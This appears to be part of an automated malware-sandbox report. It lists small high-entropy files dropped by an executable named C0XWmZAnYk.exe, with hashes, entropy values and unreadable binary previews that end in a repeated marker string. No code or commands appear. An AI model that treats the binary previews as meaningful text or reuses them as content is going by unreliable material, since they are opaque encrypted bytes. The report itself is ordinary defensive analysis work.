              Preview:.<?....&.Y..../......8.'zWT~..P.P..k...S.O|n.L.|......beZ ... G......._........H.p....n.0v"%f.._O...........[.<.p.o4.P>.....0...{.M....T.B.....>...7.BHp0.KP...G.|....@'.R.j-7>.b_.T.'.Q..F.=.e.Y.V...#.J.............X2.R..2......r.$.I..."Q..2.s..L"..........^...AU..)e.....g.[.P4...q.LZ.TZ.[.O4.3(yN.P..&....>..n........B{..Y_..>........=.p..R..[.."..;...mej.vF.7.9L.?.Wm..fv...&.u.iw..bm.i......<s..fM.a$.a./.O.(.p.'...o.?.R....|.....l.p.?.....\....\......b..=......u...5.t.<4..'Z...]....IT..1...^.g^$..IT^.._$.%.....`O%dF.OT...sXhZ.<'...,)9..l.4+D9t...;J8..c..#..P.]v.AA. ..+a.N].p.....f.k2@.TW..Hj.........8W...2..ub........".Mr}Ss.z.Z...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):811
              Entropy (8bit):7.7595724776454436
              Encrypted:false
              SSDEEP:12:LlGI8d9yzm0ARaeftp8Aj62TngHgKkszqI/uuFXmAeQgJ4YXMP5mWzRObmlQLdx6:4I8D0+vRjbrRKlGI/r744Ycxdz49d+bD
              MD5:17EFA2BA91321D257761325565FB21CC
              SHA1:027BE91A3921AC66987CAA07730244D7BAAF9127
              SHA-256:3B0A2DC409BFB1164D19E01E56EFC490BB05418F71DE259AF197C26DD3881630
              SHA-512:FDD402B5F8098387A7A2C114FCAE97FC9BE8F492B24DC419E54D3F97D2642C553DDEEF149C17BCC58B67F3EF22B2F4DAC6761D390447998CC003D85D7AF10DB4
              Malicious:false
              Preview:.<?D.8.6.C.!....h....@K......6."E.......WzLo..n.L\b.........v.f(.q..~..&....q.. ..>.A..+..b.. ..t).;t...T.T.%..n...4.e-Q.@.C8......G9N........U..UHd.B.DI...........KkPs..%.....RX.d.$.J6.g..^...a...^....-.....T....f.......0>.l...%h.+...z=.o......!.MdKNhS.F..m.......*....G..a...z..^e......X.X..8..)./..[.....Fb.......=.u.d........X].0t.p.P\.u(.N.n}....i.J..g.....]#.@...`A.iA9.C.j...aITm..."b.I..~.v...a.dC..n.....8>..y...$.#[c'...t.F.x.......;h....!...b...`.D .h.r...5}.Mmu6.v.;.[...<#P.T0..j.r%..5L...5.s r.5)Y,C...SN..4.q..4...6....u.8*.c.wW."Ra.../...dQkU.;S...........!L\..O.....fo.Ne.a....W.o.U..+.c.7.$.w........vl........:.{.<@".J.......}..*S...~.hF.K..*.......73.l..fC......,"w%.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):798
              Entropy (8bit):7.71215142166266
              Encrypted:false
              SSDEEP:24:Y9RjTA7VvbT53Bq5bpdly94+8Ge/qXm+e0nKHS6qz4ad+bD:YTyVvbF3B0zJPomp0L6qr8D
              MD5:3EA79001481B9B94988150CA716EB598
              SHA1:2D3432FF59F1253370B84312AAA4638D756175F2
              SHA-256:E130801C179B385175E87E564C7E46378878AA061D20CECC785EE096AE5DEBCF
              SHA-512:380249EA00E21FA2D50DED043F12DE803029F06F770BA647DDBE416BD8E1078A86C52FA38960DA75B0B84453FFC5A3ECB1B0DFA720A7C5310A5B538779D26AAB
              Malicious:false
              Preview:.<?y.LZ./K....8@XW.V.:Z.b.1.......9`+4.r..w....~...+..z.1.p.r.0.Xb......t...d.n.e...t$..=..G0u.~~....c...~z...N[.....IM..v..n._.A.}.o.5.>.K.dl..!(?c".E.5.B..Z.. ..o..cWy.O.J..p.=.dW.2.N....X.....T..7....sQF.&aW....m.K.....\O8x....X.....e#6...*.+_~...6o.z........R.......+..%I......`_..d..L..'..$..#m.. K=......ZM.k../..u]"....k.%.......sG...Jj..........[.7..Qr.&..0x.@.b.R:#8...}.) -....[)h..vJW?...o...........M.^U...e.L..........:..i..%..G..ex...v..n.1.?Z/%d....6..za.....yK.w.../h.9>.u0i..J.....[.7.."=..[..v......&.0..u..xr....d>...FT....Yd..s....8..A....s......>.[...x7..%.0fv.G..P.Z...H.,me....2..=R..[J.[.h..-.....MZce.{ws....-..N...Q..D......`.._.....c .F.g...Y.....p..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):828
              Entropy (8bit):7.7319375059764415
              Encrypted:false
              SSDEEP:12:Sqnp6gqUrkk+XuoAnmqjYCNWkignn/m9DP0gtnVSA7xat4TIrpCkCJTCyVLdxa3X:SqYDU4Xuoccme0gtsA7xtIrHCvVLd+bD
              MD5:26CEABB1EDB6D8E65DEA547D5073470E
              SHA1:4058A6321BB4819FD4976A7AFD225D8E3559C126
              SHA-256:909190BED80EA72BFB504F1D34F228552C09CF7C116177DDC8B78B30EAB68617
              SHA-512:0E7091D58A65273E90DEAD783F9E34E0EF966673EC603F9ADCF890F60F30566381D442E3B65413FB02C29F482350ED39EE430D13D9FBAA295374E742C28D019C
              Malicious:false
              Preview:.<?}.?.c8.nz...G..TX....uc..4..|@.....Y=2.b^.iX...;......mLv...........w.w.D.x/g.g..]..1.}1-..?...T.C....<.*...A..l..DM%.T.$.3...m..lC....X..Bf8...l)Q...4s>..v{....(.T$.,.@..2...h...<m...x.....hnL..^...n.b.%.X........_6.Vq.R..\)....P..U..|..*}....]...W_%.x.L...........`..v.....}.<.k/+.I....x..l&....y..b<^.uLg..M...X....@.pr.~U.....7..W."$..X5^.%.K............t....o|B...e........[.w.{k.U".#.8.5n.f...B..Cq)..[.E....=...........U.M..7..D.-P.....|..m_&.....QS..&.'..c.=..O...K.c.Gq......5..8..*d.Y...$HnF5.3z..$..H.cdbX.....hjY.G..%../?.W....V..tH.Ru~.../.T..[..4...f>.3UM..'k.E.Vf...W....H..hVlXZ....@.pvg.p.`..J........I.}.... .$...>.^UU....$....hh\..o.#B.WJ=P..[..d....b5 .&..T*.fe.-.0:.'.Wu..8....,r..jc...k....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.746014504266576
              Encrypted:false
              SSDEEP:12:jqzQTh/LtbsWUndyKYQ+WqhsmDmVr2ki2dbBcp9ZWfwFQqS9qpwELA6Lz5u9J6CZ:jqzQ1/x6ndyzqmDmVr2EdbcWfQk8X0zj
              MD5:035C05AB85F8D9664ABEF41807C82FA2
              SHA1:54E1B0E10106170965791F392379C52FCEBAE512
              SHA-256:5806924904304A48C7372B96C011BA0E46DA7F24787BD1FBBA8DC6D893CBF356
              SHA-512:35BE5CDA7DA353F9948A11C10C1795F9AF749389F721EF6D0C42E15188B7B83CD686EA045B6BC507C796091B1E0BDE158E01B1BBD1BAF22277D708F7E7E1E2F2
              Malicious:false
              Preview:.<?.a+:...}....(.......f..`......GV`.H...{...g.D"`.DH=Pb.$...U.}|...[...]...>...u.|.-;...X.]..n0Y{..]..........@..R.By.^k....B...........=..O......l.y...1n.6...*.xe.8.....J..F.nj.~>...]...z..}.v}0u.......q....e..F..%X..O3......x...v.s...D..Y5.]z.....0.B...348.7i..p.O.T.....Np.;9..>.9qL....0.y..U...s.....|-.................&.mW..l...%.P.4......{..5.ZR...|V..>P`}........y2.....i[.8c.e......H...E..r.|UK..e4.W.....f.r.e..>w..!}_..>(W.(..`..e.7 .:.!|zB...XZ..vv...*=....\...%n.ab.../E.....%..6...V1*.....sS.d.54+..._...$1...V.3........K..l(.0.&0Fs.f..*..w ..4/y.{......@.J..?..l.`9...+,(;|[P<...j...v../....f..ck.?....u...P..Q1.......ECgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):7.744246425722096
              Encrypted:false
              SSDEEP:12:fbl5TCZDtLzmHqapn44McoTxDzmIgh3kXwOU7CWn8pjhHeZJ2ydxa3cii9a:fZZ/q23oTxUh3kAOm8pjRkJxd+bD
              MD5:3440925AA1307458DF2BEAD010CAF873
              SHA1:1A0E59BA113CBE93A50E324615EA74DA18BBCC97
              SHA-256:1D605726EC81D962D1D5A7ADBA36C71DD3A85376198526639C754B389E5457A8
              SHA-512:DFB23D918B15346CA9D0AC94E5832A0B7ABB5984F149920BD921FD1D68A38B7C63E26EA287A2AC5C3AB5A9BD5D0F09F4FAAA1490ECAB81A553D8E9F4D63A3046
              Malicious:false
              Preview:.<?....h5-.d/M6.<.EQ..}.k.B...$}(...o..e/~...(.......\........J.r.F.....Nx`....r?....r....v..cq.c._(..i...'..y..%.cu..S..bU].8h..+.(._....l..N...".t.f...f.o5.S.h.-....T.rTn4...../..G.._.....X.-...+m..b.....G`0...V .<.a%.U.......E.T..\.AK.U.$Gr.'...a~t.e..@.../........c...{P.l.u.K.GnZN......n..4.s.....R..[{.[..........Rv..Y@.C.5..~..j.J...c..<z...1 .f$(.H.;...j.{.a.9^..........._(>j..:.9...........}...;S..k..h..1..s|.D...D.k.E....fC..4.W=.;..........}s7|.....[...c`..q.=.~.7...yc,..)p.3...1..Q._......^..r.#.PP..A..h.....^s.0..3..R..}.uo.d.F..UF.N...[...`F..3.....'...eu.$.-.;.2...9...N2.R..!....].\c[..?...>B6(x...t..-X..F.<..BoWt..o.]....u...^....".w..}..._?.....Q....V~.x..yzA.[gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):738
              Entropy (8bit):7.708870674511819
              Encrypted:false
              SSDEEP:12:dz4Cr67TFjyUR41FnpV9ReYABmZG+hbxHH4S4AbZr4508OlsMkYf1jKdxa3cii9a:dz477Rjv2FprReYZ4FAbZX8Olv9hKd+X
              MD5:AA05DE9209124C1A4B73116C05E7938C
              SHA1:8DE82A7DCC3D60F326CDC7CC051D2F0F4DD7CB35
              SHA-256:1DE943BE8B902650688C7662F8C24EBA90F33A7C61A5DBD3B230DB02B8D108F3
              SHA-512:2B28F1111D216D928F8E69EEFCFE16D0BC906A19C96174A08E76DF6B809838E9A50D1693AA63FC9CE99EF75F84195B1D9ECD08B1CFF60A2FF95F484CE5799F68
              Malicious:false
              Preview:.<?Q...K.....@..!.=...<..4U6.N.M...5.....}Oe\.4.1....D...~..K..W>\....A.)....6k.-EK.2uP.?.KGG~....A.0......%[..l...n.!...<.L.x./SO...H....9V.:.H.=........:|..8..Dl.W5jNy......\:....3.Sy{.Q..3.(.Y.".^.....D.0.*Yl...KM.0,JK.!ceVu.(S`.V.0.7!J.Q\}L.z(q.s5..&D..zGB.!rQ.:..w.|..P..M.V.Dj.....^..p.=.{r....l@<..v..o....S.G+....H......t.....>..1....N.P.M..5|.&.W..<OXE>)......`R...~1.-...4h .gx...hY....d....%.iL@..bAOcJ..D 1....N[..EA^...s.;.<v..B.s.P...8..9.h-......A*.R......X_.D......'.$.{R..m..]4....6..<...$......V...c;R.........g...wp.. ..+..Br.h.#.`./.....Y.,..x...A/m1...?e.W....K.5k.............K.M.!...y&'.p.....G..>.)D.....hI.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):802
              Entropy (8bit):7.718464225083176
              Encrypted:false
              SSDEEP:24:1wtIhcdj0o92U0c+aInD6MnknL9LDNjxlKTutd+bD:UwTo92UmfnWMuL9LdPKI8D
              MD5:B6CCF893580A8F457F959C7C05803B71
              SHA1:B595B9DF2DE1D6BA82B4F96A014909BE2A95E7B8
              SHA-256:4C0472C67C7DD9DD2C1C0829897F95219C144E5F4F02719A2D7F82356E9081E2
              SHA-512:D8ACD626FC2A2253B8D1A68917E6CC55BCB3EA18D742366E79396454F7BFF3707FAC7328920A55E6BE3E9C77AFF213F42A607B3DB0BD96F54F8E52B5E2D2D8E0
              Malicious:false
              Preview:.<?.:4..Z.I.-.....Ah.]F.*wLQN.....~|..#.oZ%n.....Po..u7.......C hd...d....1../....=.....rI.O...`......h...eiK+h....8..<O....j.... f..E..T`_..-.B9..&.8........Ug..e..s......\....j.`...?....z..1.!NT@C....#.@Mhu.Vj.E..J.M...._.j.)..H.uy.w)*C{..e5.k.6=7....v|]...X:.5...U.........Q...y...5O.^..r...5......<..)..Rd....p0....I.x'?......)|y./...y....Tu.L....".Qz.......uXq. .?D.j......_..e.5<...4J.t...1..^G0.+.>F%_L...:...9J..v. .a.XJ..!...........]/:...N......%....4...|F.vPMf.....W......y.4L......5.2......k/..i.....#-..j.y.z...|.....T ...A.pC.7..z..G...AP._6.C..p...1.7X..0[<.\A."....3.....VDe`...B........KI.c.y...+...;...}.....TdW...Np..G.....=... .*..P...b..:q...es..1.Y.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):762
              Entropy (8bit):7.707265843534169
              Encrypted:false
              SSDEEP:12:Yn81ijM0TQaHC3XoZAGj0kOeiOQ4T72w9Q9L1TeLOg5kVZVbVN1alkHPyRdxa3cq:2tk3wp0k7VB9EL1TUOg5M7bVvqRd+bD
              MD5:F83D8BAE4F442237243223B0174B6240
              SHA1:62222203979203D14CC29DDB5DBDD46AB07C5983
              SHA-256:4AA6FF869C19A03B03212C28CE2A5052F02E4D459FAAEDF2123549C59CCDBE6A
              SHA-512:5995A2DAED569A9D4512A7D93F0F893EF486BCB667C3AA96F61A35CEB4FA31AE318F52021ABB76BB460A1AE7E23150D74E5FA92844D1E9E7BEFE28383222A529
              Malicious:false
              Preview:.<?.,.B(.?..e..xy..y....K.8..q+.......D...l.UE..Z...3........myb.y...4.=..k...Vp....@.....3../K.....0.D.6..N.%...V.......s.<.....a...gy...V.Ui.U...........D.,.$...d..J.K?....s.jV}..X.lPJ.m.....p-._..e..O.<A....."...jk...-..^..(.}4R..TkRe .$.).{....<Y.s..\>=..J+C.Qb1.U..7...%........)a5.y..r.......y.....t....n.]..._..q....9..n......@i.H.W.Vlu..Sw.<H.........s....i.......t.6!.'..U......$.......g...Q......b.*%.\.{.... -.E......H/.....\.WJU.._..dp...[.2xK.r=4....K...M&.<4]q3..j.7...S.M...AxT.I;....q2.@..@c..7.$...vn....H..ZP\9}..S...H$R+.r..1...@...L..P{S.\.[Q.f<...m.._`....D.,.l.9...~R.J..i.WdT...(x..".<.[N.......ui..MNs+.;.0..Yp&....`gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):833
              Entropy (8bit):7.756206490786097
              Encrypted:false
              SSDEEP:12:JSwglXAAMooYI1BdKZms/3Hbe+8doaxOkByxp1R1qwsrXN+222TsWprEBprfyQlg:JSV1X/atxFA9SwsJ+T2T5u1lbPJd+bD
              MD5:C34CBDCDBB6AA6795A105D7C96468DC3
              SHA1:327DA810E6CFB1E2FB053A9DD45D49955E1DDA27
              SHA-256:8ED58CFA0975BE78557C93C649F7A1029CB5E2EB4D3D913ED229EECBB5F9F3B4
              SHA-512:73D937C9EE182D4B817FD27D4D6EC81B98725072B53A04CB489DF61F46CDBD8DABFC677E2BD6D5F73C74D48B4EEDDB019ABDDB82BD0BC9443065B7B68CF52ADC
              Malicious:false
              Preview:.<?...\...~.....t...>.-<...c.. ~..k.].bV..k.'.<a-.9.....3..wUGsrG..x&....S.%...G...(...\...=:.s..63...Ko.........'v5.ga.. ..#!.d);gF..M..?f.u......z....%.H.9.9...|.....|..J..4(..........rt Uw.FAy.b/z....c.7.".....N;..6..\./+fj.^v....<.....v.m....K..&.%..5...]..1.`v.....|..Q.2......~..\.O.u.xg.....2FJ.w$>."..qu....c...!\z.s...}.)....g~.7..&.u4.G..^.f.{F...P .s.K4u.H.F..H...I.e.p....Ly..J.."y..r...a...''..p.E...`.;....FA....5...N.`3V.A PP...D.t..DV..0..9.<.T!......6.b...;....../.9q....+)....0...t".k^....o.....Y....t..X62..hy.j........k"k...6Y.w.L...$..K....9..).Tz$..c."VR.[....@...............O...IC.............]..7..N.x.a*.B..B)G.O..QX...k?.$@,Mc..Sq..b...{....!b7....C.yg..(..W.T.{.M....U....s...h.;F.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.678929717554422
              Encrypted:false
              SSDEEP:12:R2Vv11K6/zMY8n9vSHwzVM/6FUK0K6BmPz80CU8xlevBN1IxMFm94K7cdxa3ciik:QVv37AXvSIVnFcKpb35vBNyxMFm9kd+X
              MD5:D7F4CB89961E4E210853EB622CEF6F2C
              SHA1:3D2148B9A8C7D4004FD113A66E7D11D7DA8C85D5
              SHA-256:A1292A81E66DDB08D7127CF023FCEA5FA067DF4DB02AB9F9E95F7AFE3A7C018C
              SHA-512:B0E78A35A6DC2FE994A2C6C39A646FBAFD35BF2C22763E7A44F79DB133E1B206A29CC48CFD08396E6D7441CDAF41ED47390D55E43D97A17A2CC9B9EC6BF09F84
              Malicious:false
              Preview:.<?.BSp...EeoP./........d.:6..k..u.?LK..i...`..2..A.}..a0.Ja.@...p........./.BeB.W..uk.m.a.....m.....#....v.Le...<?......~..f.0<)..p..DJ...Z.;...p..........!e..v.K..`mU.-...0...6.H.0..._...5.....P.P9...v...~..K.6N..V.@..'..A\.@E......or.8.}.R7oh.....0gJ[`.4R3.h.....8...na.@8......Ob......-.5da.6.....3.'.T<Y...&...VE..8R.....".........:..<9_.,.>]`:....!#...g.f=-....C.7...p.8).s(+......'..o...e&...V.K.z-5l$2z..z.?.@..r.....fOn...vT-.....n.a.qrX"..E..j......Hq..dr..{;V...P.P...M.eO..U..i..c..kKL.rO.v..l.v.L;..|2:..[...:.Tc,.C(.VI.q..jL..Mo....9W...&.@Lp0.......g#..W\V.>/]n(._....... .C...1.:F.|....4...K..`A.z.V&..y..B..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.717191133883312
              Encrypted:false
              SSDEEP:24:r+/9Ox6a1ZI32uOBtL9yqKxbJSIBSd+bD:WksQZ0axFKxEJ8D
              MD5:56E82278F6BEADD1F83DC72C5DCCA825
              SHA1:F003EDFA64FA7A1698FB8E7C19D1D7352F5C7486
              SHA-256:E4F3F938F8569243BF5FA136DA1077B84AA3FE15549004D9C2D19263ACD702AB
              SHA-512:88438FFD8CC4240BA9FBE54C71D5228ADFD1802399A6AA85139A0412C61D5651CAB305FF090CDE911CAEBDCFE03801EAA8C742C3F7EE2B1CDD8897D4C5BC97B8
              Malicious:false
              Preview:.<?.M.o<......g..@.K.t...\G....[.1...E[p...+..s......s&.O=B.........$q)%.7m...z?...................,.......Me....:.v1~/.q..r..$j.v..k..4.:..@F.....v=5.........6_WR.H<.....I.p..>.P.....'|f.HC..?M....YV.4..l........}W..\1r.Sr.n..J.~._..HAF...?k........<tq';.{....c..pp..$..{(LK..v.$.n.Bc..>T:")..3;,...wc.Lv.U.3.fh.[..+.......~.M?-;.l+....#.ccvt........>.....+$.[.%X.\U........VM}.........."..x.u.. ..k1..>J2...$.^:.#.;.e..H..f...H=...."...`.1u..;...29e...].F...Q...]0...l.............a..C.~7..h......t..w.m....(2.:...R:..v.{..S.....~+sKc..x..-E..3.N..,K.....82m..p..lNM..L](....rH...+....0"C9._.O:."......4....gL.$T.D./U..@.HLn.f..=q[j...6...;..&.m'e.0....I...:{..Dc..(.....P....0-...X.Q..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.736685104619866
              Encrypted:false
              SSDEEP:12:GA3hW91HtO+umQfpmOA7CNhmM7gV8jFHJdOUbio4Zi3hRbhit5dxa3cii9a:5h0NOSanw8LdOk94ZiRG3d+bD
              MD5:F97D355461A1A80FAA920B8983EC09DD
              SHA1:40B7EDEA54FDAA7BE043BD7799CB60606122C2CD
              SHA-256:1CA5CBA2C3673416F05F888F3E90C43ED13C8347BAB0F8184CF4A287D4A782C8
              SHA-512:E9512BBAC092182C547A5149271E90E4A2E10EB93C31C4ADA2AD5416BFBF353E457F8C5D4B3389D122DDB9915C263F5BEDA451ACF7F5061BDFFCC354B5A0EB36
              Malicious:false
              Preview:.<?..!.wC:.....mko.k.H..3.E.4..)A.........n.<h.....W9 .,.N.....v.$.iM.z.......QT'Z9I...Q9.a.l.n._..).T.k......a..\..G.)...?...a..s.L.....aeX..(.?&E......~"........=l......B.0..B^....{...u..u..JS..o...s...|@5..`..K.8..;.......Ib............:.y..3a.-.L...-.5...co...g>b..}:..9/....S......CrR.*.n...,?..&.."N.<.}x.TY.h.{a.....3.[-...).^.8..w.^.\w....Z".`..>...%D..de.)..K..U;2.]...-k.tc}....,.....9.I.02.../..^..Z..PEFD.).{V....&..2.9.c.xv..{..C..~..p..Jr....e.Y=..h.0N.R{.g2..Zu...7f...../=o.b..!.....=.n.0z.?.I....p......;..(}.....#....`.K..CX.q"...V....=u-/......k>....u{,...W..bl.JF.<.\.p...Hh.(._...;..q.12..1..e....L....1gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):828
              Entropy (8bit):7.718017986481515
              Encrypted:false
              SSDEEP:24:CowI/dxSK6nVvsWoWNmvRxcBNgqz6gd+bD:rwIlUV5loW5zz6W8D
              MD5:3542F81D0B0E4BCDC9495445A60943DB
              SHA1:24ED85405CAE9FF7B66D09BA4F7F70F52AAD6E3A
              SHA-256:C43D990D316FD6009D9AE490634FC737A251BD13BDA98DDA6969FECC3DB9B2C4
              SHA-512:B63C5B228056EF607AFEAED08E7AD6BDD2CB071399375C2D43C708C9AB5ACF60FFBAE0F36BE5DB1C4FA269DA6C288743A71B822E0D2EBBB1A2523A053D279DC8
              Malicious:false
              Preview:.<?V_LM..g?.....-%.q$........R....bE..k...<8x)..E1..'...9...6.>ri.|.g...,e...<_1....yV\....."..G;....s.}.8...9v......;.X*..&9.........(.o4..?.>. _AQ+..X..[...p...BF.$@.....T-.3.?....:LJZ.].P...[L....R..W.NE...H....W...<X......}.C.T.h..$[.NK5.."..../...EIgArFD.1..X%....u.......eIO.T;&..%Yd`...J<...<...... O..F....m...r.}.....x..;.N0=.#C..&.|..v.>...fkc....N.....k..H-....(.U~O../..WC3..c.S3..L<.\w........_8..2...-..$..AOR.I.....P../}E.. B..F].....w...&..\}..{W......`z.L..8.D...\...........{;k.y..$$..R]^Rau.6..(KrE~@.c... G.....I....._B6.[bi.p....m....x..6].t..k8.....B.<.......>.....L.."Nr...P.i..R...O..}.......1.X.Q.]...%...OH..L.|}~....y....4.p_e.0]}.Dq*..LzL.#K.T..<../d.6.x..4...y..d.h.l..<.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):754
              Entropy (8bit):7.719351457549381
              Encrypted:false
              SSDEEP:12:zaGSsT+f+L6iILCis+P+jD5BAjhFu/smapj5uS3GOcdfVtg0Y9C5JctV1IpPdxan:zajsSf3WE+jkHuE1pYesvxksJMV1Id+X
              MD5:7CD080C2F79FE2526EDD319F32555C77
              SHA1:0858EF33231EBEC92B22E07BE050CAC515009AB0
              SHA-256:63B2664747A8C1B65DC5AE30956110A7E9CFF4E288D1135DCEE14A3165D2A0CB
              SHA-512:7050BB9A5958940BF8AE66CF07FFA3AAAFF013BFB5B2E8C90E2C9ACF81ACA5C2AB2AD81083AA139EA2F6CFE24D5649A59801B1EA81F80AC746DC7E2E07D9168B
              Malicious:false
              Preview:.<?..7.t.e....Y|;$J........$Y/...i..t...x.p^..T....b...R'.......(...d....aN....X..u..i...4.............c....T...IS..Qb..e..V0....g.!.5S9..S-.........2...,.W/. H.*+..j+.e.B .Ay.K. -..z....{..f{......bT...SLduh.[%W....5F.............y. x$..1..8...v.o;...b..!.5Y.....{.+zG.v3.;..dy$.-.E8.....6#|..Q...f..ZTIOt.J*...f.y:..I..)Un_tt.G.....$(...g.c.?....V..!Ot.[K.....oh.~^......Q=..v.A@*.F.q0.a.L'.CE.D.+d3..V_..]......Y.&... M..6WR.Vd.6[\=>.g....TO...J^_i.e...o\..k.....+...4..T.U>.3I.h...6"e.9.~..f..m`$.U...W@EX8.a)P.5..$.Qhm./R.O\I..(<.AO!...G.b....w,:..s...c..i./T.-...7Rh....%.... :...O-.........2x.4...h.....A.H.I.......{/...?.r'{..........mgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):806
              Entropy (8bit):7.73736781874411
              Encrypted:false
              SSDEEP:12:sFI06fmEtEUQbqk25OMxHVidKYQjsPlfccOmPdzRZGN9bfFJSvnePdxa3cii9a:sFumEzQbqk25/x1iAnIPFcchHlcd+bD
              MD5:1F6EDFF40890BAA3B30025526B6D54EA
              SHA1:841D14B140225CEDA5FCB0877E08EE1F47C5C8F0
              SHA-256:41A67DC7C047C4684EFCE04042835746D2F7C0BC7EBEEC9F2618A51198B6E6BA
              SHA-512:7F6B4F7E0416A9D35E74A3E90193E685B4D0E9D034853361DF5FF4A416B3F6F08BD07C48B1D3572B1803F1BA38A2C5E7B8E205A8D4FB3794975F6A4E0AFAC651
              Malicious:false
              Preview:.<?.6..>.....8..".L..3.*....~U...d...n...$vRu.......T.*bD[...}~.!.&.S8..9!~..n..N...1.{........C..|..uvD.v'r..&./.I...P.?V./#.......S@.f...m.....1V....lg........Q...A0....a./. ..f.}.z;...Hka...[...y....j)......0..S...(W....w..x.n.s.8.@.HF...J_%.....R.......k3...;...j.Nm..f.p.=...>.f.$N......T.U.9e..cr...Z.y.Q.,....yS..|..cz.....F...beT...!.u=.]....*B.!.1...l.]<.t3..z..(..........%j..t..f\..}.....t......^....9H.vib.\..uN.D.L`?_R.$6....i..d..@..,.f.$.c.u.....GN-..|N....G...^zxT;..l..Dz^......4.6....|..J.(.{..+e..>@!.Q+.{..g&..[.Ty..;{.,.(...^..r&.<o}.To.....]/..4...<..E.._>.2..`D....[......9....7C\xa.a.e..hr.^...?.X......h.[....:H:.|O..2k.}.~........._.....i.lS...].......h..e.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.703952812054547
              Encrypted:false
              SSDEEP:12:npcJxR5y5g57B4kXAJ8H0yVsVH2+vkDlexNUBVhhNeggKDArTwCzdxa3cii9a:OLR5ym57BnXP0yVsVH2+vkDloUn/NegB
              MD5:C99BC6115C8480A97B0CC9B94E468513
              SHA1:B21BF46BDC72143FB7402BC3A00DC9EF07BFD16D
              SHA-256:10FA6A24BC8906C5B1F750FFDA43FDBBE8ADE38BAA6286015009B7349AA21D75
              SHA-512:DFD7D02FA913C038E3C65A72AEC29584E8EE6E5F1889D4C4C6C7768C70DD92EE529A2B29FD7DD5020B377CDA83791E75DD8830DBAF837FFE2F655DBC8B973A4A
              Malicious:false
              Preview:.<?=1(U.xz.P.8........K.....{.R.{...)[+..M(A.P;v........u..DzX...G...+..2.......x4....nY"...1.I....$.E....E..&}.1YV..../.9.F9...Y...AI.r,.<qY!q.p....".4v.1_vs..w..}.N..tT..|.$VS.tX.,.rE.k..<E..5..uH..3.x...A....Koh2%.l\...........c%....D..t*.....y.|..W.M.\k.y.,q,.!O...u.m........d....{.|..h.v..ED.So..F.G...G...pN..3'......r.s..2...Ro\02...EFX..s..+..h........C.......].C..I-.r...SK.......<.}....nJ~h...i."....4.. %..._@hH0.t....;....!r..`t...)....^....`+.....{}(.J.F..3.uK3.....I...RF.-?Sh=R..M.......$.3.....c.....5.'......^.....^...C...2...a......)b..hx..x...A.;.......cN....E.%+T9.#..It.........=.T9s$.=...)..Y.O.rm.x..U..-........^.......v...TH.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
